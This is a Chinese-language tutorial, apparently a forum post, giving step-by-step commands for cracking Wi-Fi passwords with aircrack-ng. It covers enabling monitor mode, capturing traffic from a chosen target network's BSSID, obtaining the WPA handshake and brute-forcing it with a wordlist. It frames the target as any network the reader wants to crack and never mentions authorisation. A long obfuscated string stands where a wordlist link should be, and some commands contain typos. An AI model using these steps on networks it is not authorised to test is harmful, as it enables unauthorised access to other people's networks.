测试环境在linux平台下，我用的是ubuntu环境。ubuntu安装可以直接用sudo apt-get install aircrack-ng
linux应该可以用yum -y install  aircrack-ng 来安装，如果下载它的安装包，没有fangqian的话，非常慢。

------------------------------------------------------------------------------------

方法:

1.确保你的无线是打开的:ifconfig看是否有wlan0或别的无线适配器已经启动,如果没有,后面的步骤都执行不了

　　可以先用ifconfig -a看是否有无线适配器,再用ifconfig wlan0 up命令启动无线适配器(wlan0为ifconfig -a中查找到的无线适配器名称)

2.激活网卡为监听模式:

sudo airmon-ng start wlan0
3.查看无线网络,开始抓取无线数据包

sudo airodump-ng mon0
注意：这里的mon0是你的wlan开始监听之后的别名，一般可能会出现的问题是：

rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network
如果出现这个问题，按照这个来解决

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

sudo airodump-ng wlan0
或者：

airmon-ng check kill
airmon-ng start <interface>
airodump-ng wlan0mon
不过网络管理给关掉了

sudo servicenetwork-manager stop # 停止 nm服务

udo servicenetwork-manager start # 开启 nm服务
如果一切没有问题====》

这时就会显示你当前可以搜索到的无线信号,PWR是信号值,数值越大表示信号越强,ESSID就是这个信号的名称.ENC为加密方式(WEP最容易破,wpa,wpa2都只能暴力破解)

找到一个你希望破解的essid

4.确定目标后

sudo airodump-ng -c 6 --bssid target's MAC -w file mon0
-c 6是指这个信号的频道 ，就是CH那个频道

target's MAC 是你想要破解的MAC地址

file 是aircrack-ng 跟目标地址握手后保存的数据

5.收到足够的包之后(即data),开始破解

sudo aircrack-ng file-01.cap
file-01.cap 就是握手后保存的数据

如果是wep类型的密码,在收到足够多的包之后(1w)可以直接破解

如果是wpa/wpa2类型的加密方式,则必须收到握手包之后才能开始暴力破解并且需要使用密码文件(给出一个地址:9f2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4@1j5i4c8A6j5#2)9J5k6h3S2S2j5$3E0W2M7Y4y4Y4j5i4u0S2k6$3g2Q4x3X3g2U0L8$3#2Q4x3V1k6V1j5i4u0C8j5K6m8V1k6g2)9J5k6h3I4K6N6q4)9J5k6h3N6*7i4K6t1&6i4@1f1#2i4@1p5$3i4K6R3J5i4@1f1$3i4K6W2q4i4K6W2o6i4@1f1#2i4@1q4r3i4K6R3$3i4@1f1%4i4@1p5H3i4K6R3I4i4@1f1^5i4@1t1$3i4@1t1K6i4@1f1#2i4@1p5@1i4K6W2r3i4@1f1#2i4@1p5@1i4K6S2p5i4@1f1$3i4K6W2p5i4K6R3J5i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1^5i4@1q4r3i4K6W2p5i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1$3i4@1p5H3i4@1t1%4i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1#2i4@1q4r3i4K6R3$3i4@1f1%4i4@1p5H3i4K6R3I4i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3i4@1f1@1i4@1t1&6i4K6W2r3i4@1f1$3i4K6V1^5i4@1q4r3i4@1f1@1i4@1t1^5i4K6S2p5i4@1f1#2i4@1p5@1i4K6W2r3i4@1f1%4i4K6W2m8i4K6R3@1i4K6u0o6i4@1f1&6i4K6W2o6i4K6R3H3i4@1f1^5i4@1p5$3i4K6R3I4i4@1f1^5i4K6R3%4i4@1q4m8i4@1f1#2i4@1t1%4i4@1t1I4i4@1f1#2i4K6S2q4i4@1u0n7i4@1f1@1i4@1t1^5i4K6S2n7i4@1f1$3i4K6W2n7i4@1t1@1i4@1f1#2i4@1p5@1i4K6S2p5i4@1f1$3i4K6W2p5i4K6R3J5i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1#2i4K6S2m8i4@1p5H3i4@1f1#2i4@1q4r3i4K6R3$3i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3

sudo aircrack-ng -w dic file-01.cap
破解成功就能拿到密码了

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课